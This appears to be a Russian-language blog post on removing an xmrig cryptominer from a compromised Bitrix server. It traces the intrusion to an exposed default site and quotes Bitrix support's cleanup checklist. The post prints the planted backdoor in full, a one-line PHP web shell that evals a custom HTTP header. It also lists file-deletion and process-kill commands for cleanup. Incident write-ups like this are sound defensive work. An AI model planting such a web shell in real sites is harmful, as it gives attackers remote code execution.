Устранение майнера moneroocean xmrig
posted in Bitrix, взлом и безопасность |Всем привет!
Не так давно ко мне обратились за помощью для устранения вредоносного ПО на сайте — майнера moneroocean xmrig который после удаления всегда появлялся по пути
/tmp/.tmp/moneroocean/config_background.json
Первичная уязвимость оказалась в том, что на хостинге забыли удалить сайт по умолчанию в /home/bitrix/www — в итоге установочные скрипты были доступны по IP адресу сервера, чем и воспользовались злоумышленники — разместили бэкдор /.500.php следующего содержания
|
1 |
<?php header('X-Header: 927'); @eval($_SERVER['HTTP_BABIFUV_MOHAGUS']); ?> |
В решении вопроса помог саппорт Битрикса (я почему-то сразу упёрся в анализ логов и поиск бэкдора в /ext_www/ где были расположены сайты, а про /www/ как то позабыл).
Приведу полный текст саппорта, т.к. там приведены другие возможные места размещение бэкдора (у меня там было чисто):
Добрый день!
Если ваш сервер был заражен майнером Xmrig, то рекомендации могут быть следующими.
— зайти по ssh на сервер
— посмотреть, есть ли процесс xmrig, если да, то откуда он запущен
— завершить процесс майнера xmrig
— проверить — удалить папки /home/bitrix/.system и /home/bitrix/.web, (вероятно, xmrig лежит там):pkill -f ‘sql_backup.sql’
pkill -f ‘bitrix_sql_dump’
pkill -f ‘xmrig’
rm /tmp/xmrig
rm /home/bitrix/sql_backup.sql
rm /home/bitrix/bitrix_sql_dump
rm /home/bitrix/.web
find /home/bitrix/ -maxdepth 5 -name auth_login.php | xargs rm— Удалить файл /home/butrix/.winds
— проверить, нет ли каких-то служб в systemctl или задач в crontab, которые вы не создавали, удалить лишнее и подозрительное
— удалить по всем сайтам файл auth_login.php (лежит, как правило, в корне и папке /bitrix/admin)
— проверить сайт через сканер троянов https://marketplace.1c-bitrix.ru/solut…rix.xscan/ (?)
— проверить содержимое файлов t.php и 404.php на предмет вредоносного кода
— удалить сайт по умолчанию в /home/bitrix/www, если он не нужен.
— проверить, нет ли в системе лишних администраторов, сменить пароли, настроить двухфакторную авторизацию (Битрикс, ssh, ftp, mysql)
— сменить ключи всех API интеграций, если таковые использовалисьК сожалению, вынуждены отметить, что выполнения данных действий может быть недостаточно для полного излечения, так как на вашей установке ситуация может отличаться. Поэтому, настоятельно рекомендуем привлечь к анализу ситуации опытного системного администратора и, если есть, специалиста по безопасности.